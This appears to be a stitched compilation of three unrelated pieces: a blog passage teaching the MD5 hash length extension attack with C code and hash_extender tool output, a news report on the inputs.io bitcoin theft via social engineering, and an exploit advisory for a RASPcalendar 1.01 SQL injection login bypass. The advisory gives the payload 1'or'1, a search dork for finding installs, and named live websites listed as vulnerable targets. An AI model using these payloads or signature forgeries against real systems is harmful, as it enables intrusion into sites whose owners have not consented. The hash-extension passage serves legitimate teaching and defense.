0030 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 ........P....... Breaking down the string, we have: “secret” = secret “data” = data 80 00 00 … — The 46 bytes of padding, starting with 0×80 50 00 00 00 00 00 00 00 — The bit length in little endian This is the exact data that H hashed in the original example. The attack Now that we have the data that H hashes, let’s look at how to perform the actual attack. First, let’s just append append to the string. Easy enough! Here’s what it looks like: 0000 73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 secretdata...... 0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 ........P....... 0040 61 70 70 65 6e 64 append The hash of that block is what we ultimately want to a) calculate, and get the server to calculate. The value of that block of data can be calculated in two ways: By sticking it in a buffer and performing H(buffer) By starting at the end of the first block, using the state we already know from signature, and hashing append starting from that state The first method is what the server will do, and the second is what the attacker will do. Let’s look at the server, first, since it’s the easier example. Server’s calculation We know the server will prepend secret to the string, so we send it the string minus the secret value: 0000 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 data............ 0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 50 00 00 00 00 00 00 00 61 70 70 65 6e 64 ..P.......append Don’t be fooled by this being exactly 64 bytes (the blocksize) — that’s only happening because secret and append are the same length. Perhaps I shouldn’t have chosen that as an example, but I’m not gonna start over! The server will prepend secret to that string, creating: 0000 73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 secretdata...... 0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 ........P....... 0040 61 70 70 65 6e 64 append And hashes it to the following value: 6ee582a1669ce442f3719c47430dadee For those of you playing along at home, you can prove this works by copying and pasting this into a terminal: echo ' #include <stdio.h> #include <openssl/md5.h> int main(int argc, const char *argv[]) { MD5_CTX c; unsigned char buffer[MD5_DIGEST_LENGTH]; int i; MD5_Init(&c); MD5_Update(&c, "secret", 6); MD5_Update(&c, "data" "\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x50\x00\x00\x00\x00\x00\x00\x00" "append", 64); MD5_Final(buffer, &c); for (i = 0; i < 16; i++) { printf("%02x", buffer); } printf("\n"); return 0; }' > hash_extension_1.c gcc -o hash_extension_1 hash_extension_1.c -lssl -lcrypto ./hash_extension_1 All right, so the server is going to be checking the data we send against the signature 6ee582a1669ce442f3719c47430dadee. Now, as the attacker, we need to figure out how to generate that signature! Client’s calculation So, how do we calculate the hash of the data shown above without actually having access to secret? Well, first, we need to look at what we have to work with: data, append, H, and H(secret || data). We need to define a new function, H?, which uses the same hashing algorithm as H, but whose starting state is the final state of H(secret || data), i.e., signature. Once we have that, we simply calculate H?(append) and the output of that function is our hash. It sounds easy (and is!); have a look at this code: echo ' #include <stdio.h> #include <openssl/md5.h> int main(int argc, const char *argv[]) { int i; unsigned char buffer[MD5_DIGEST_LENGTH]; MD5_CTX c; MD5_Init(&c); MD5_Update(&c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 64); c.A = htonl(0x6036708e); /* <-- This is the hash we already had */ c.B = htonl(0xba0d11f6); c.C = htonl(0xef52ad44); c.D = htonl(0xe8b74d5b); MD5_Update(&c, "append", 6); /* This is the appended data. */ MD5_Final(buffer, &c); for (i = 0; i < 16; i++) { printf("%02x", buffer); } printf("\n"); return 0; }' > hash_extension_2.c gcc -o hash_extension_2 hash_extension_2.c -lssl -lcrypto ./hash_extension_2 The the output is, just like before: 6ee582a1669ce442f3719c47430dadee So we know the signature is right. The difference is, we didn’t use secret at all! What’s happening!? Well, we create a MD5_CTX structure from scratch, just like normal. Then we take the MD5 of 64 ‘A’s. We take the MD5 of a full (64-byte) block of ‘A’s to ensure that any internal values — other than the state of the hash itself — are set to what we expect. Then, after that is done, we replace c.A, c.B, c.C, and c.D with the values that were found in signature: 6036708eba0d11f6ef52ad44e8b74d5b. This puts the MD5_CTX structure in the same state as it finished in originally, and means that anything else we hash — in this case append — will produce the same output as it would have had we hashed it the usual way. We use htonl() on the values before setting the state variables because MD5 — being little-endian — outputs its values in little-endian as well. Result So, now we have this string: 0000 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 data............ 0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 50 00 00 00 00 00 00 00 61 70 70 65 6e 64 ..P.......append And this signature for H(secret || data || append): 6ee582a1669ce442f3719c47430dadee And we can generate the signature without ever knowing what the secret was! So, we send the string to the server along with our new signature. The server will prepend the signature, hash it, and come up with the exact same hash we did (victory!). The tool You can grab the hash_extender tool on Github! This example took me hours to write. Why? Because I made about a thousand mistakes writing the code. Too many NUL bytes, not enough NUL bytes, wrong endianness, wrong algorithm, used bytes instead of bits for the length, and all sorts of other stupid problems. The first time I worked on this type of attack, I spent from 2300h till 0700h trying to get it working, and didn’t figure it out till after sleeping (and with Mak’s help). And don’t even get me started on how long it took to port this attack to MD5. Endianness can die in a fire. Why is it so difficult? Because this is crypto, and crypto is immensely complicated and notoriously difficult to troubleshoot. There are lots of moving parts, lots of side cases to remember, and it’s never clear why something is wrong, just that the result isn’t right. What a pain! So, I wrote hash_extender. hash_extender is (I hope) the first free tool that implements this type of attack. It’s easy to use and implements this attack for every algorithm I could think of. Here’s an example of its use: $ ./hash_extender --data data --secret 6 --append append --signature 6036708eba0d11f6ef52ad44e8b74d5b --format md5 Type: md5 Secret length: 6 New signature: 6ee582a1669ce442f3719c47430dadee New string: 64617461800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000000000000617070656e64 If you’re unsure about the hash type, you can let it try different types by leaving off the –format argument. I recommend using the –table argument as well if you’re trying multiple algorithms: $ ./hash_extender --data data --secret 6 --append append --signature 6036708eba0d11f6ef52ad44e8b74d5b --out-data-format html --table md4 89df68618821cd4c50dfccd57c79815b data80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000P00000000000000append md5 6ee582a1669ce442f3719c47430dadee data80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000P00000000000000append There are plenty of options for how you format inputs and outputs, including HTML (where you use %NN notation), CString (where you use \xNN notation, as well as \r, \n, \t, etc.), hex (such as how the hashes were specified above), etc. By default I tried to choose what I felt were the most reasonable options: Input data: raw Input hash: hex Output data: hex Output hash: hex Here’s the help page for reference: -------------------------------------------------------------------------------- HASH EXTENDER -------------------------------------------------------------------------------- By Ron Bowes See LICENSE.txt for license information. Usage: ./hash_extender <--data=|--file=> --signature= --format= [options] INPUT OPTIONS -d --data= The original string that we're going to extend. --data-format= The format the string is being passed in as. Default: raw. Valid formats: raw, hex, html, cstr --file= As an alternative to specifying a string, this reads the original string as a file. -s --signature= The original signature. --signature-format= The format the signature is being passed in as. Default: hex. Valid formats: raw, hex, html, cstr -a --append= The data to append to the string. Default: raw. --append-format= Valid formats: raw, hex, html, cstr -f --format= [REQUIRED] The hash_type of the signature. This can be given multiple times if you want to try multiple signatures. 'all' will base the chosen types off the size of the signature and use the hash(es) that make sense. Valid types: md4, md5, ripemd160, sha, sha1, sha256, sha512, whirlpool -l --secret= The length of the secret, if known. Default: 8. --secret-min= --secret-max= Try different secret lengths (both options are required) OUTPUT OPTIONS --table Output the string in a table format. --out-data-format= Output data format. Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy --out-signature-format= Output signature format. Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy OTHER OPTIONS -h --help Display the usage (this). --test Run the test suite. -q --quiet Only output what's absolutely necessary (the output string and the signature) Defense So, as a programmer, how do you solve this? It’s actually pretty simple. There are two ways: Don’t trust a user with encrypted data or signatures, if you can avoid it. If you can’t avoid it, then use HMAC instead of trying to do it yourself. HMAC is designed for this. HMAC is the real solution. HMAC is designed for securely hashing data with a secret key. As usual, use constructs designed for what you’re doing rather than doing it yourself. The key to all crypto! [pun intended] And finally, you can grab the hash_extender tool on Github! Source: blog.skullsecurity.org

Here’s your digital-currency lesson of the day, courtesy of a guy who calls himself TradeFortress: “I don’t recommend storing any bitcoins accessible on computers connected to the internet.” That may sound like a paradox. Bitcoin is the world’s most popular digital currency, and it’s controlled by a vast collection of computers spread across the internet. But TradeFortress knows what he’s talking about. He’s the founder of a inputs.io, a company that used to store bitcoins in digital wallets for people across the globe. The site was just hacked, with the bandits making off with more than a million dollars’ worth of bitcoins. Yes, bitcoins are digital. And, yes, bitcoin transactions necessarily happen on the internet. But you can store bitcoins offline, and that’s what the most careful of investors will do. A collection of bitcoins is essentially a private cryptograph key you can use to send money to someone else, and though you can store that key in an online digital wallet, you can also store it on an offline computer — and even on a physical item here in the real world, writing it on a piece of paper or engraving it on a ring. That’s why your money can’t be hacked. Until last week, inputs.io seemed like a nifty service for Bitcoin users. The company not only offered bitcoin wallets, it mixed the wallets up in order to anonymize the coins they stored, sped up bitcoin payments, and even spared them from the tiny transaction fees that are typically charged on the bitcoin network. But there was a catch. You had to trust the company — and its internet-connected computers — with your bitcoins. In retrospect, that was a bad idea. And now, Inputs.io customers are learning just how bad of an idea it was. The site was compromised on Oct 23, and again on Oct. 26, and hackers made off with 4,100 bitcoins ($1.2 million) stolen in two separate attacks. The company waited until this week to notify customers of the incident, which only affects certain users. A small number of Bitcoins belonging to TradeFortress’s other business, CoinLenders, were also taken, TradeFortress said in an email interview (He didn’t provide his real name). Inputs.io doesn’t have the funds to pay back everything that was stolen, but TradeFortress says he’s going to issue partial refunds. “I’m repaying with all of my personal Bitcoins, as well as remaining cold storage coins on Inputs, which adds up to 1540 BTC,” he told WIRED. TradeFortress says that this was a social engineering attack, meaning that the attacker masqueraded as someone he wasn’t in order to get access to the site’s systems on cloud-hosting provider Linode. “The attack was done through compromising a chain of email accounts which eventually allowed the attacker to reset the password for the the Linode server,” he said. The hacker’s first step was recovering an email address for an account that TradeFortress set up six years ago. The “attacker rented an Australian server to proxy as close to my geographical location so it won’t raise alarms with email recoveries,” TradeFortress said in a forum post. “I know this doesn’t mean much, but I’m sorry, and saying that I’m very sad that this happened is an understatement,” TradeFortress wrote on the inputs.io website. UPDATE: 6:25 EST 11/07/13: This story has been updated to include comment from TradeFortress. Via wired.com

RASPcalendar version 1.01 suffers from a remote SQL injection vulnerability that allows for login bypass. --------------------------------------------------- RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities --------------------------------------------------- Author : Hackeri-AL Date : 06-11-2013 Vendor Homepage : http://www.rttucson.com/files.html Software link : http://www.rttucson.com/RASPcalendar.zip Verison : 1.01 Tested On : Windows XP ------------------------------------------------------------ Google Dork: allinurl:RASPcalendar "powered by RASPcalendar" ------------------------------------------------------------ Example : http://www.usfim.it/RASPcalendar/ : http://site.com/events : http://site.com/calendar : etc... Go to : http://www.usfim.it/RASPcalendar/admin/ UserName : 1'or'1 PassWord : 1'or'1 Login Success Fully ------------------------------------------------------------ Vuln sites demo : http://www.usfim.it/RASPcalendar/admin http://www.davemitchellassociates.com/events/admin http://www.bradandrebecca.com/Calendar/admin http://www.hlubline.com/pt/calendar/admin ------------------------------------------------------------ Found By Hackeri-AL , UAH-Crew Group 2009-2013 UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~ [~] Legends Of Albania ------------------------------------------------------------ RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities